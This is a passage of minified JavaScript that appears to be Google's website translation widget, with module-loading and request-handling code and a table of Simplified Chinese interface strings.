Me.prototype.dispose=function(){sa(_.Da(this.g),this.F);this.g={};this.l=[];this.o=[];this.B=[];this.h=[];this.pa={};this.V=!0};Me.prototype.eb=function(){return this.V};_.ha=function(){return new Me};var bf=[],cf=function(a){function b(d){d&&jc(d,function(e,f){e[f.id]=!0;return e},c.cl)}var c={cl:{},index:bf.length,Eo:a};b(a.Be);b(a.To);bf.push(c);a.Be&&_.hc(a.Be,function(d){var e=d.id;e instanceof _.dc&&d.module&&(e.g=d.module)})};cf({Be:[{id:_.ec,tb:jb,multiple:!0}]});var hf;_.df=function(a,b,c,d,e,f,g){var h="";a&&(h+=a+":");c&&(h+="//",b&&(h+=b+"@"),h+=c,d&&(h+=":"+d));e&&(h+=e);f&&(h+="?"+f);g&&(h+="#"+g);return h};_.ef=RegExp("^(?:([^:/?#.]+):)?(?://(?:([^\\\\/?#]*)@)?([^\\\\/?#]*?)(?::([0-9]+))?(?=[\\\\/?#]|$))?([^?#]+)?(?:\\?([^#]*))?(?:#([\\s\\S]*))?$");_.ff=function(a){return a?decodeURI(a):a};
|
||||
_.gf=function(a,b){if(a){a=a.split("&");for(var c=0;c<a.length;c++){var d=a[c].indexOf("="),e=null;if(d>=0){var f=a[c].substring(0,d);e=a[c].substring(d+1)}else f=a[c];b(f,e?_.uc(e):"")}}};hf=function(a,b,c){if(Array.isArray(b))for(var d=0;d<b.length;d++)hf(a,String(b[d]),c);else b!=null&&c.push(a+(b===""?"":"="+_.tc(b)))};var jf={};var kf=new _.dc("MpJwZc","MpJwZc");_.lf=new _.dc("UUJqVe","UUJqVe");var mf=new pd,nf=function(a,b,c){_.qd.call(this,a,b);this.node=b;this.kind=c};_.y(nf,_.qd);_.of=RegExp("^(ar|ckb|dv|he|iw|fa|nqo|ps|sd|ug|ur|yi|.*[-_](Adlm|Arab|Hebr|Nkoo|Rohg|Thaa))(?!.*[-_](Latn|Cyrl)($|-|_))($|-|_)","i");_.pf=function(a,b){b||_.fb();this.j=a||null};_.pf.prototype.ia=function(a,b){a=a(b||{},this.j?this.j.g():{});this.h(null,"function"==typeof _.qf&&a instanceof _.qf?a.Tb:null);return String(a)};_.pf.prototype.h=function(){};var rf=function(a){this.h=a;this.j=this.h.g(_.lf)};rf.prototype.g=function(){this.h.eb()||(this.j=this.h.g(_.lf));return this.j?this.j.j():{}};var sf=function(a){var b=new rf(a);_.pf.call(this,b,a.get(_.ec).h);this.l=new _.G;this.o=b};_.y(sf,_.pf);sf.prototype.g=function(){return this.o.g()};sf.prototype.h=function(a,b){_.pf.prototype.h.call(this,a,b);this.l.dispatchEvent(new nf(mf,a,b))};_.pa(kf,sf);cf({Be:[{id:kf,tb:sf,multiple:!0}]});var tf=function(a,b){this.defaultValue=a;this.type=b;this.value=a};tf.prototype.get=function(){return this.value};tf.prototype.set=function(a){this.value=a};var uf=function(a){tf.call(this,a,"b")};_.y(uf,tf);uf.prototype.get=function(){return this.value};var vf=function(){this.g={};this.j="";this.h={}};vf.prototype.toString=function(){var a=this.j+wf(this);var b=this.h;var c=[],d;for(d in b)hf(d,b[d],c);b=c.join("&");c="";b!=""&&(c="?"+b);return a+c};
|
||||
var zf=function(a){a=xf(a,"md");return!!a&&a!=="0"},wf=function(a){var b=[],c=(0,_.C)(function(d){this.g[d]!==void 0&&b.push(d+"="+this.g[d])},a);zf(a)?(c("md"),c("k"),c("ck"),c("am"),c("rs"),c("gssmodulesetproto"),c("slk"),c("dti")):(c("sdch"),c("k"),c("ck"),c("am"),c("rt"),"d"in a.g||Af(a,"d","0"),c("d"),c("exm"),c("excm"),(a.g.excm||a.g.exm)&&b.push("ed=1"),c("im"),c("dg"),c("sm"),xf(a,"br")!="1"&&xf(a,"br")!="0"||c("br"),c("br-d"),xf(a,"rb")=="1"&&c("rb"),xf(a,"zs")!=="0"&&c("zs"),Bf(a)!==""&&
|
||||
c("wt"),c("gssmodulesetproto"),c("ujg"),c("sp"),c("rs"),c("cb"),c("ee"),c("slk"),c("dti"),c("m"));return b.join("/")},xf=function(a,b){return a.g[b]?a.g[b]:null},Af=function(a,b,c){c?a.g[b]=c:delete a.g[b]},Bf=function(a){switch(xf(a,"wt")){case "0":return"0";case "1":return"1";case "2":return"2";default:return""}},Ef=function(a){var b=b===void 0?!0:b;var c=Cf(a),d=new vf,e=c.match(_.ef)[5];_.nc(Df,function(g){var h=e.match("/"+g+"=([^/]+)");h&&Af(d,g,h[1])});var f="";f=a.indexOf("_/ss/")!=-1?"_/ss/":
|
||||
"_/js/";d.j=a.substr(0,a.indexOf(f)+f.length);if(!b)return d;(a=c.match(_.ef)[6]||null)&&_.gf(a,function(g,h){d.h[g]=h});return d},Cf=function(a){return a.startsWith("https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=")?a.substr(65):a},Df={Cm:"k",Nl:"ck",qm:"m",Yl:"exm",Wl:"excm",El:"am",om:"mm",Bm:"rt",jm:"d",Xl:"ed",Mm:"sv",Ol:"deob",Ll:"cb",Jm:"rs",Dm:"sdch",lm:"im",Pl:"dg",Ul:"br",Tl:"br-d",Vl:"rb",fn:"zs",dn:"wt",Zl:"ee",Lm:"sm",pm:"md",hm:"gssmodulesetproto",an:"ujg",Zm:"sp",
|
||||
Im:"slk",Ql:"dti"};_.Ff=function(a){_.w.call(this);this.h=a;this.g={}};_.E(_.Ff,_.w);var Gf=[];_.Ff.prototype.L=function(a,b,c,d){return Hf(this,a,b,c,d)};var Hf=function(a,b,c,d,e,f){Array.isArray(c)||(c&&(Gf[0]=c.toString()),c=Gf);for(var g=0;g<c.length;g++){var h=_.F(b,c[g],d||a.handleEvent,e||!1,f||a.h||a);if(!h)break;a.g[h.key]=h}return a};_.Ff.prototype.Kb=function(a,b,c,d){return If(this,a,b,c,d)};
|
||||
var If=function(a,b,c,d,e,f){if(Array.isArray(c))for(var g=0;g<c.length;g++)If(a,b,c[g],d,e,f);else{b=_.Ed(b,c,d||a.handleEvent,e,f||a.h||a);if(!b)return a;a.g[b.key]=b}return a};_.Ff.prototype.fb=function(a,b,c,d,e){if(Array.isArray(b))for(var f=0;f<b.length;f++)this.fb(a,b[f],c,d,e);else c=c||this.handleEvent,d=_.za(d)?!!d.capture:!!d,e=e||this.h||this,c=Fd(c),d=!!d,b=_.ud(a)?a.Zc(b,c,d,e):a?(a=_.Hd(a))?a.Zc(b,c,d,e):null:null,b&&(_.Md(b),delete this.g[b.key]);return this};
|
||||
_.Jf=function(a){_.nc(a.g,function(b,c){this.g.hasOwnProperty(c)&&_.Md(b)},a);a.g={}};_.Ff.prototype.K=function(){_.Ff.P.K.call(this);_.Jf(this)};_.Ff.prototype.handleEvent=function(){throw Error("L");};var Kf,Lf=function(){};_.E(Lf,tb);Lf.prototype.g=function(){return new XMLHttpRequest};Kf=new Lf;_.E(ub,tb);ub.prototype.g=function(){var a=new XMLHttpRequest;if("withCredentials"in a)return a;if(typeof XDomainRequest!="undefined")return new Mf;throw Error("M");};var Mf=function(){this.g=new XDomainRequest;this.readyState=0;this.onreadystatechange=null;this.responseType=this.responseText="";this.status=-1;this.statusText="";this.g.onload=(0,_.C)(this.pi,this);this.g.onerror=(0,_.C)(this.jg,this);this.g.onprogress=(0,_.C)(this.fk,this);this.g.ontimeout=(0,_.C)(this.jk,this)};_.l=Mf.prototype;
|
||||
_.l.open=function(a,b,c){if(c!=null&&!c)throw Error("N");this.g.open(a,b)};_.l.send=function(a){if(a)if(typeof a=="string")this.g.send(a);else throw Error("O");else this.g.send()};_.l.abort=function(){this.g.abort()};_.l.setRequestHeader=function(){};_.l.getResponseHeader=function(a){return a.toLowerCase()=="content-type"?this.g.contentType:""};_.l.pi=function(){this.status=200;this.responseText=this.g.responseText;Nf(this,4)};_.l.jg=function(){this.status=500;this.responseText="";Nf(this,4)};
|
||||
_.l.jk=function(){this.jg()};_.l.fk=function(){this.status=200;Nf(this,1)};var Nf=function(a,b){a.readyState=b;if(a.onreadystatechange)a.onreadystatechange()};Mf.prototype.getAllResponseHeaders=function(){return"content-type: "+this.g.contentType};var Pf,Qf;_.Of=function(a){_.G.call(this);this.headers=new Map;this.O=a||null;this.h=!1;this.g=null;this.A="";this.o=0;this.j=this.I=this.B=this.G=!1;this.C=0;this.l=null;this.M="";this.F=!1};_.E(_.Of,_.G);Pf=/^https?$/i;Qf=["POST","PUT"];_.Rf=[];_.Of.prototype.N=function(){this.dispose();_.wa(_.Rf,this)};
|
||||
_.Of.prototype.send=function(a,b,c,d){if(this.g)throw Error("Q`"+this.A+"`"+a);b=b?b.toUpperCase():"GET";this.A=a;this.o=0;this.G=!1;this.h=!0;this.g=this.O?this.O.g():Kf.g();this.g.onreadystatechange=Wd((0,_.C)(this.J,this));try{this.I=!0,this.g.open(b,String(a),!0),this.I=!1}catch(g){Sf(this);return}a=c||"";c=new Map(this.headers);if(d)if(Object.getPrototypeOf(d)===Object.prototype)for(var e in d)c.set(e,d[e]);else if(typeof d.keys==="function"&&typeof d.get==="function"){e=_.z(d.keys());for(var f=
|
||||
e.next();!f.done;f=e.next())f=f.value,c.set(f,d.get(f))}else throw Error("R`"+String(d));d=Array.from(c.keys()).find(function(g){return"content-type"==g.toLowerCase()});e=_.u.FormData&&a instanceof _.u.FormData;!_.ua(Qf,b)||d||e||c.set("Content-Type","application/x-www-form-urlencoded;charset=utf-8");b=_.z(c);for(d=b.next();!d.done;d=b.next())c=_.z(d.value),d=c.next().value,c=c.next().value,this.g.setRequestHeader(d,c);this.M&&(this.g.responseType=this.M);"withCredentials"in this.g&&this.g.withCredentials!==
|
||||
this.F&&(this.g.withCredentials=this.F);try{this.l&&(clearTimeout(this.l),this.l=null),this.C>0&&(this.l=setTimeout(this.V.bind(this),this.C)),this.B=!0,this.g.send(a),this.B=!1}catch(g){Sf(this)}};_.Of.prototype.V=function(){typeof Qb!="undefined"&&this.g&&(this.o=8,this.dispatchEvent("timeout"),this.abort(8))};var Sf=function(a){a.h=!1;a.g&&(a.j=!0,a.g.abort(),a.j=!1);a.o=5;Tf(a);Uf(a)},Tf=function(a){a.G||(a.G=!0,a.dispatchEvent("complete"),a.dispatchEvent("error"))};
|
||||
_.Of.prototype.abort=function(a){this.g&&this.h&&(this.h=!1,this.j=!0,this.g.abort(),this.j=!1,this.o=a||7,this.dispatchEvent("complete"),this.dispatchEvent("abort"),Uf(this))};_.Of.prototype.K=function(){this.g&&(this.h&&(this.h=!1,this.j=!0,this.g.abort(),this.j=!1),Uf(this,!0));_.Of.P.K.call(this)};_.Of.prototype.J=function(){this.eb()||(this.I||this.B||this.j?Vf(this):this.R())};_.Of.prototype.R=function(){Vf(this)};
|
||||
var Vf=function(a){if(a.h&&typeof Qb!="undefined")if(a.B&&(a.g?a.g.readyState:0)==4)setTimeout(a.J.bind(a),0);else if(a.dispatchEvent("readystatechange"),(a.g?a.g.readyState:0)==4){a.h=!1;try{_.Wf(a)?(a.dispatchEvent("complete"),a.dispatchEvent("success")):(a.o=6,Tf(a))}finally{Uf(a)}}},Uf=function(a,b){if(a.g){a.l&&(clearTimeout(a.l),a.l=null);var c=a.g;a.g=null;b||a.dispatchEvent("ready");try{c.onreadystatechange=null}catch(d){}}};_.Of.prototype.isActive=function(){return!!this.g};
|
||||
_.Wf=function(a){var b=_.Xf(a);a:switch(b){case 200:case 201:case 202:case 204:case 206:case 304:case 1223:var c=!0;break a;default:c=!1}if(!c){if(b=b===0)a=String(a.A).match(_.ef)[1]||null,!a&&_.u.self&&_.u.self.location&&(a=_.u.self.location.protocol.slice(0,-1)),b=!Pf.test(a?a.toLowerCase():"");c=b}return c};_.Xf=function(a){try{return(a.g?a.g.readyState:0)>2?a.g.status:-1}catch(b){return-1}};_.Yf=function(a){try{return a.g?a.g.responseText:""}catch(b){return""}};var $f=function(a){_.w.call(this);this.G=a;this.B=Ef(a);this.l=this.o=null;this.J=!0;this.h=new _.Ff(this);this.M=[];this.A=new Set;this.g=[];this.O=new Zf;this.j=[];this.C=!1;a=(0,_.C)(this.F,this);jf.version=a};_.y($f,_.w);var ag=function(a,b){a.g.length&&Ge(b,a.g[a.g.length-1]);a.g.push(b);Ce(b,function(){_.wa(this.g,b)},a)};$f.prototype.I=function(a,b,c){var d=c===void 0?{}:c;var e=d.qj;c=d.tj;var f=d.If;d=d.Wk;a=bg(this,a,b,e,c);cg(this,a,f,d,c)};
|
||||
var bg=function(a,b,c,d,e){d=d===void 0?{}:d;var f=[];dg(a,b,c,d,e===void 0?!1:e,function(g){f.push(g.Ya())});return f},dg=function(a,b,c,d,e,f,g){g=g===void 0?{}:g;b=_.z(b);for(var h=b.next();!h.done;h=b.next()){var k=h.value;h=c[k];!e&&(a.A.has(k)||h.g)||g[k]||(g[k]=!0,k=d[k]?Object.keys(d[k]):[],dg(a,h.h.concat(k),c,d,e,f,g),f(h))}},cg=function(a,b,c,d,e){e=e===void 0?!1:e;var f=[],g=new ve;b=[b];for(var h=function(p,q){for(var r=[],t=0,A=Math.floor(p.length/q)+1,D=0;D<q;D++){var L=(D+1)*A;r.push(p.slice(t,
|
||||
L));t=L}return r},k=b.shift();k;){var m=eg(a,k,!!e,!0);if(m.length<=2E3){if(k=fg(a,k,e))f.push(k),Ge(g,k.g)}else b=h(k,Math.ceil(m.length/2E3)).concat(b);k=b.shift()}var n=new ve;ag(a,n);Ce(n,function(){return gg(a,f,c,d)});De(n,function(){var p=new hg;p.j=!0;p.h=-1;gg(this,[p],c,d)},a);Ce(g,function(){return n.callback()});g.callback()},fg=function(a,b,c){var d=eg(a,b,!(c===void 0||!c));a.M.push(d);b=_.z(b);for(c=b.next();!c.done;c=b.next())a.A.add(c.value);if(a.C)a=_.hd(document,"SCRIPT"),_.Ta(a,
|
||||
_.wb(d)),a.type="text/javascript",a.async=!1,document.body.appendChild(a);else{var e=new hg,f=new _.Of(a.j.length>0?new ub:void 0);a.h.L(f,"success",(0,_.C)(e.C,e,f));a.h.L(f,"error",(0,_.C)(e.B,e,f));a.h.L(f,"timeout",(0,_.C)(e.A,e));Hf(a.h,f,"ready",f.dispose,!1,f);f.C=3E4;ig(a.O,function(){f.send(d);return e.g});return e}return null},gg=function(a,b,c,d){for(var e=!1,f,g=!1,h=0;h<b.length;h++){var k=b[h];if(!f&&k.j){e=!0;f=k.h;break}else k.l&&(g=!0)}h=_.xa(a.g);(e||g)&&f!=-1&&(a.g.length=0);if(e)c&&
|
||||
c(f);else if(g)d&&d();else for(a=0;a<b.length;a++)d=b[a],jg(d.o,d.Oa)||c&&c(8001);(e||g)&&f!=-1&&_.hc(h,function(m){m.cancel()})};$f.prototype.K=function(){this.h.dispose();delete jf.version;_.w.prototype.K.call(this)};$f.prototype.F=function(){return xf(this.B,"k")};
|
||||
var eg=function(a,b,c,d){d=d===void 0?!1:d;var e=_.ff(a.G.match(_.ef)[3]||null);if(a.j.length>0&&!_.ua(a.j,e)&&e!=null&&window.location.hostname!=e)throw Error("U`"+e);var f=a.B;e=new vf;e.g=Object.assign({},f.g);e.j=f.j;e.h=Object.assign({},f.h);delete e.g.m;delete e.g.exm;delete e.g.ed;Af(e,"m",b.join(","));a.o&&(Af(e,"ck",a.o),a.l&&Af(e,"rs",a.l));Af(e,"d","0");c&&(a=_.vc(),e.h.zx=a);a=e.toString();d&&a.lastIndexOf("/",0)==0&&(d=document.location.href.match(_.ef),a=_.df(d[1],d[2],d[3],d[4])+a);
|
||||
return a},jg=function(a,b){var c="";if(a.length>1&&a.charAt(a.length-1)==="\n"){var d=a.lastIndexOf("\n",a.length-2);d>=0&&(c=a.substring(d+1,a.length-1))}d=c.length-11;if(d>=0&&c.indexOf("Google Inc.",d)==d||c.lastIndexOf("//# sourceMappingURL=",0)==0)try{c=window;a=a+"\r\n//# sourceURL="+b;a=_.vb(a);var e=_.Ra(a);var f=_.Sa(e);c.eval(f)===f&&c.eval(f.toString())}catch(g){return!1}else return!1;return!0},kg=function(a){var b=_.ff(a.match(_.ef)[5]||null)||"";b=_.ff(Cf(b).match(_.ef)[5]||null);return(b===
|
||||
null?0:RegExp("(/_/js/)|(/_/ss/)","g").test(b)&&/\/k=/.test(b))?a:null},hg=function(){this.g=new ve;this.Oa=this.o="";this.j=!1;this.h=0;this.l=!1};hg.prototype.C=function(a){this.o=_.Yf(a);this.Oa=String(a.A);this.g.callback()};hg.prototype.B=function(a){this.j=!0;this.h=_.Xf(a);this.g.callback()};hg.prototype.A=function(){this.l=!0;this.g.callback()};
|
||||
var Zf=function(){this.g=0;this.h=[]},ig=function(a,b){a.h.push(b);lg(a)},lg=function(a){for(;a.g<5&&a.h.length;)mg(a,a.h.shift())},mg=function(a,b){a.g++;Ce(b(),function(){this.g--;lg(this)},a)};var ng=new uf(!1),og=document.location.href;
|
||||
cf({flags:{dml:ng},initialize:function(a){var b=ng.get(),c="",d="";window&&window._F_cssRowKey&&(c=window._F_cssRowKey,window._F_combinedSignature&&(d=window._F_combinedSignature));if(c&&typeof window._F_installCss!=="function")throw Error("S");var e,f=_.u._F_jsUrl;f&&(e=kg(f));!e&&(f=document.getElementById("base-js"))&&(e=f.src?f.src:f.getAttribute("href"),e=kg(e));e||(e=kg(og));e||(e=document.getElementsByTagName("script"),e=kg(e[e.length-1].src));if(!e)throw Error("T");e=new $f(e);c&&(e.o=c);
|
||||
d&&(e.l=d);e.C=b;b=_.ja();b.C=e;b.Yh(!0);b=_.ja();b.Xf(a);a.B(b)}});
|
||||
_._ModuleManager_initialize=function(a,b){if(!_.ca){if(!_.ha)return;_.ia()}_.ca.Wf(a,b)};
|
||||
_._ModuleManager_initialize('b/n73qwf/sy1/sy0:2/sy2/sy3/rJmJrc:3,4,5/sy4:3/byfTOb:7/sy5/sy6:9/sy7:a/sy8/sy9:9/LEikZe:4,5,7,b,c,d/UUJqVe/MpJwZc/GHAeAc/sya/Wt6vjf:4,a,i/lsjVmc:b,c/syb/el_conf:l/el_main_css/syd:b,i/sye:9/syf/el_main:2,d,l,n,o,p,q/corsproxy/website_error/navigationui:a,q/phishing_protection:o,q/_stam:p',['syb','el_conf']);
|
||||
}catch(e){_._DumpException(e)}
|
||||
try{
|
||||
_.N={};MSG_TRANSLATE="\u7ffb\u8bd1";_.N[0]=MSG_TRANSLATE;MSG_CANCEL="\u53d6\u6d88";_.N[1]=MSG_CANCEL;MSG_CLOSE="\u53d6\u6d88";_.N[2]=MSG_CLOSE;MSGFUNC_PAGE_TRANSLATED_TO=function(a){return"Google \u5df2\u5c06\u6b64\u7f51\u9875\u81ea\u52a8\u7ffb\u8bd1\u6210\uff1a"+a};_.N[3]=MSGFUNC_PAGE_TRANSLATED_TO;MSGFUNC_TRANSLATED_TO=function(a){return"\u5df2\u7ffb\u8bd1\u4e3a\u4ee5\u4e0b\u8bed\u8a00\uff1a"+a};_.N[4]=MSGFUNC_TRANSLATED_TO;MSG_GENERAL_ERROR="\u9519\u8bef\uff1a\u670d\u52a1\u5668\u65e0\u6cd5\u5b8c\u6210\u60a8\u7684\u8bf7\u6c42\u3002\u8bf7\u7a0d\u540e\u518d\u8bd5\u3002";
|
||||
_.N[5]=MSG_GENERAL_ERROR;MSG_LEARN_MORE="\u4e86\u89e3\u8be6\u60c5";_.N[6]=MSG_LEARN_MORE;MSGFUNC_POWERED_BY=function(a){return"\u7531 "+a+"\u5f3a\u529b\u9a71\u52a8"};_.N[7]=MSGFUNC_POWERED_BY;MSG_TRANSLATE_PRODUCT_NAME="\u7ffb\u8bd1";_.N[8]=MSG_TRANSLATE_PRODUCT_NAME;MSG_TRANSLATION_IN_PROGRESS="\u6b63\u5728\u7ffb\u8bd1";_.N[9]=MSG_TRANSLATION_IN_PROGRESS;MSGFUNC_TRANSLATE_PAGE_TO=function(a){return"\u7528 Google \u7ffb\u8bd1\u5c06\u6b64\u7f51\u9875\u7ffb\u8bd1\u6210"+a+"\uff1f"};_.N[10]=MSGFUNC_TRANSLATE_PAGE_TO;
|
||||
MSGFUNC_VIEW_PAGE_IN=function(a){return"\u4f7f\u7528\u4ee5\u4e0b\u8bed\u8a00\u67e5\u770b\u6b64\u7f51\u9875\uff1a"+a};_.N[11]=MSGFUNC_VIEW_PAGE_IN;MSG_RESTORE="\u663e\u793a\u539f\u6587";_.N[12]=MSG_RESTORE;MSG_SSL_INFO_LOCAL_FILE="\u6b64\u672c\u5730\u6587\u4ef6\u7684\u5185\u5bb9\u5c06\u901a\u8fc7\u5b89\u5168\u8fde\u63a5\u53d1\u9001\u7ed9 Google \u8fdb\u884c\u7ffb\u8bd1\u3002";_.N[13]=MSG_SSL_INFO_LOCAL_FILE;MSG_SSL_INFO_SECURE_PAGE="\u6b64\u5b89\u5168\u7f51\u9875\u7684\u5185\u5bb9\u5c06\u901a\u8fc7\u5b89\u5168\u8fde\u63a5\u53d1\u9001\u7ed9 Google \u8fdb\u884c\u7ffb\u8bd1\u3002";
|
||||
_.N[14]=MSG_SSL_INFO_SECURE_PAGE;MSG_SSL_INFO_INTRANET_PAGE="\u6b64 Intranet \u7f51\u9875\u7684\u5185\u5bb9\u5c06\u901a\u8fc7\u5b89\u5168\u8fde\u63a5\u53d1\u9001\u7ed9 Google \u8fdb\u884c\u7ffb\u8bd1\u3002";_.N[15]=MSG_SSL_INFO_INTRANET_PAGE;MSG_SELECT_LANGUAGE="\u9009\u62e9\u8bed\u8a00";_.N[16]=MSG_SELECT_LANGUAGE;MSGFUNC_TURN_OFF_TRANSLATION=function(a){return"\u5173\u95ed"+a+"\u7ffb\u8bd1"};_.N[17]=MSGFUNC_TURN_OFF_TRANSLATION;
|
||||
MSGFUNC_TURN_OFF_FOR=function(a){return"\u5173\u95ed\u4ee5\u4e0b\u8bed\u8a00\u7684\u81ea\u52a8\u6a2a\u5e45\u5f39\u51fa\u529f\u80fd\uff1a"+a};_.N[18]=MSGFUNC_TURN_OFF_FOR;MSG_ALWAYS_HIDE_AUTO_POPUP_BANNER="\u59cb\u7ec8\u9690\u85cf";_.N[19]=MSG_ALWAYS_HIDE_AUTO_POPUP_BANNER;MSG_ORIGINAL_TEXT="\u539f\u6587\uff1a";_.N[20]=MSG_ORIGINAL_TEXT;MSG_FILL_SUGGESTION="\u63d0\u4f9b\u66f4\u597d\u7684\u7ffb\u8bd1\u5efa\u8bae";_.N[21]=MSG_FILL_SUGGESTION;MSG_SUBMIT_SUGGESTION="\u63d0\u4f9b\u5efa\u8bae";_.N[22]=MSG_SUBMIT_SUGGESTION;
|
||||
MSG_SHOW_TRANSLATE_ALL="\u5168\u90e8\u7ffb\u8bd1";_.N[23]=MSG_SHOW_TRANSLATE_ALL;MSG_SHOW_RESTORE_ALL="\u5168\u90e8\u6062\u590d";_.N[24]=MSG_SHOW_RESTORE_ALL;MSG_SHOW_CANCEL_ALL="\u5168\u90e8\u53d6\u6d88";_.N[25]=MSG_SHOW_CANCEL_ALL;MSG_TRANSLATE_TO_MY_LANGUAGE="\u5c06\u8fd9\u4e9b\u5185\u5bb9\u7ffb\u8bd1\u6210\u6211\u7684\u8bed\u8a00";_.N[26]=MSG_TRANSLATE_TO_MY_LANGUAGE;MSGFUNC_TRANSLATE_EVERYTHING_TO=function(a){return"\u5c06\u6240\u6709\u5185\u5bb9\u7ffb\u8bd1\u6210"+a};_.N[27]=MSGFUNC_TRANSLATE_EVERYTHING_TO;
|
||||
MSG_SHOW_ORIGINAL_LANGUAGES="\u663e\u793a\u6e90\u8bed\u8a00";_.N[28]=MSG_SHOW_ORIGINAL_LANGUAGES;MSG_OPTIONS="\u9009\u9879";_.N[29]=MSG_OPTIONS;MSG_TURN_OFF_TRANSLATION_FOR_THIS_SITE="\u5173\u95ed\u5bf9\u6b64\u7f51\u7ad9\u7684\u7ffb\u8bd1";_.N[30]=MSG_TURN_OFF_TRANSLATION_FOR_THIS_SITE;_.N[31]=null;MSG_ALT_SUGGESTION="\u663e\u793a\u5176\u4ed6\u7ffb\u8bd1";_.N[32]=MSG_ALT_SUGGESTION;MSG_ALT_ACTIVITY_HELPER_TEXT="\u70b9\u51fb\u4e0a\u65b9\u7684\u5b57\u8bcd\u5373\u53ef\u83b7\u53d6\u5176\u4ed6\u7ffb\u8bd1";
|
||||
_.N[33]=MSG_ALT_ACTIVITY_HELPER_TEXT;MSG_USE_ALTERNATIVES="\u91c7\u7528";_.N[34]=MSG_USE_ALTERNATIVES;MSG_DRAG_TIP="\u6309\u4f4f Shift \u952e\u8fdb\u884c\u62d6\u52a8\u53ef\u91cd\u65b0\u6392\u5e8f";_.N[35]=MSG_DRAG_TIP;MSG_CLICK_FOR_ALT="\u70b9\u51fb\u53ef\u663e\u793a\u5176\u4ed6\u7ffb\u8bd1";_.N[36]=MSG_CLICK_FOR_ALT;MSG_DRAG_INSTUCTIONS="\u6309\u4f4f Shift \u952e\u7684\u540c\u65f6\u70b9\u51fb\u5e76\u62d6\u52a8\u4e0a\u65b9\u7684\u5b57\u8bcd\u5373\u53ef\u91cd\u65b0\u6392\u5e8f\u3002";_.N[37]=MSG_DRAG_INSTUCTIONS;
|
||||
MSG_SUGGESTION_SUBMITTED="\u611f\u8c22\u60a8\u4e3a Google \u7ffb\u8bd1\u63d0\u4f9b\u7ffb\u8bd1\u5efa\u8bae\u3002";_.N[38]=MSG_SUGGESTION_SUBMITTED;MSG_MANAGE_TRANSLATION_FOR_THIS_SITE="\u7ba1\u7406\u6b64\u7f51\u7ad9\u7684\u7ffb\u8bd1";_.N[39]=MSG_MANAGE_TRANSLATION_FOR_THIS_SITE;MSG_ALT_AND_CONTRIBUTE_ACTIVITY_HELPER_TEXT="\u70b9\u51fb\u67d0\u4e2a\u5b57\u8bcd\u663e\u793a\u5176\u4ed6\u7ffb\u8bd1\u6216\u53cc\u51fb\u67d0\u4e2a\u5b57\u8bcd\u76f4\u63a5\u8fdb\u884c\u4fee\u6539";_.N[40]=MSG_ALT_AND_CONTRIBUTE_ACTIVITY_HELPER_TEXT;
|
||||
MSG_ORIGINAL_TEXT_NO_COLON="\u539f\u6587";_.N[41]=MSG_ORIGINAL_TEXT_NO_COLON;_.N[42]="\u7ffb\u8bd1";_.N[43]="\u7ffb\u8bd1";_.N[44]="\u60a8\u6240\u505a\u7684\u66f4\u6b63\u5df2\u63d0\u4ea4\u3002";MSG_LANGUAGE_UNSUPPORTED="\u9519\u8bef\uff1a\u4e0d\u652f\u6301\u7f51\u9875\u6240\u7528\u8bed\u8a00\u3002";_.N[45]=MSG_LANGUAGE_UNSUPPORTED;MSG_LANGUAGE_TRANSLATE_WIDGET="\u8bed\u8a00\u7ffb\u8bd1\u5fae\u4ef6";_.N[46]=MSG_LANGUAGE_TRANSLATE_WIDGET;MSG_RATE_THIS_TRANSLATION="\u8bf7\u5bf9\u6b64\u7ffb\u8bd1\u8bc4\u5206";
|
||||
_.N[47]=MSG_RATE_THIS_TRANSLATION;MSG_FEEDBACK_USAGE_FOR_IMPROVEMENT="\u60a8\u7684\u53cd\u9988\u5c06\u7528\u4e8e\u6539\u8fdb\u8c37\u6b4c\u7ffb\u8bd1";_.N[48]=MSG_FEEDBACK_USAGE_FOR_IMPROVEMENT;MSG_FEEDBACK_SATISFIED_LABEL="\u7ffb\u8bd1\u8d28\u91cf\u5f88\u68d2";_.N[49]=MSG_FEEDBACK_SATISFIED_LABEL;MSG_FEEDBACK_DISSATISFIED_LABEL="\u7ffb\u8bd1\u8d28\u91cf\u5f88\u5dee";_.N[50]=MSG_FEEDBACK_DISSATISFIED_LABEL;MSG_TRANSLATION_NO_COLON="\u7ffb\u8bd1";_.N[51]=MSG_TRANSLATION_NO_COLON;
|
||||
}catch(e){_._DumpException(e)}
|
||||
try{
|
||||
_.la("el_conf");
|
||||
var Cl;_._exportVersion=function(a){_.bc("google.translate.v",a)};_._getCallbackFunction=function(a){return _.Rb(a)};_._exportMessages=function(){_.bc("google.translate.m",_.N)};Cl=function(a){var b=document.getElementsByTagName("head")[0];b||(b=document.body.parentNode.appendChild(document.createElement("head")));b.appendChild(a)};_._loadJs=function(a){var b=_.hd(document,"SCRIPT");b.type="text/javascript";b.charset="UTF-8";_.Ta(b,_.wb(a));Cl(b)};
|
||||
_._loadCss=function(a){var b=document.createElement("link");b.type="text/css";b.rel="stylesheet";b.charset="UTF-8";b.href=a;Cl(b)};_._isNS=function(a){a=a.split(".");for(var b=window,c=0;c<a.length;++c)if(!(b=b[a[c]]))return!1;return!0};_._setupNS=function(a){a=a.split(".");for(var b=window,c=0;c<a.length;++c)b.hasOwnProperty?b.hasOwnProperty(a[c])?b=b[a[c]]:b=b[a[c]]={}:b=b[a[c]]||(b[a[c]]={});return b};_.bc("_exportVersion",_._exportVersion);_.bc("_getCallbackFunction",_._getCallbackFunction);
|
||||
_.bc("_exportMessages",_._exportMessages);_.bc("_loadJs",_._loadJs);_.bc("_loadCss",_._loadCss);_.bc("_isNS",_._isNS);_.bc("_setupNS",_._setupNS);window.addEventListener&&typeof document.readyState=="undefined"&&window.addEventListener("DOMContentLoaded",function(){document.readyState="complete"},!1);
|
||||
_.na();
|
||||
}catch(e){_._DumpException(e)}
|
||||
}).call(this,this.default_tr);
|
||||
// Google Inc.
|
||||
|
||||
//# sourceURL=/_/translate_http/_/js/k=translate_http.tr.zh_CN.fqgcS9ZTTKg.O/am=AMA/d=1/rs=AN8SPfogPb2VeHntrU4EUFzYA8vB3EZrgA/m=el_conf
|
||||
// Configure Constants
|
||||
(function(){
|
||||
let gtConstEvalStartTime = new Date();
|
||||
if (_isNS('google.translate.Element')){return}
|
||||
|
||||
(function(){
|
||||
const c=_setupNS('google.translate._const');
|
||||
|
||||
c._cest = gtConstEvalStartTime;
|
||||
gtConstEvalStartTime = undefined; // hide this eval start time constant
|
||||
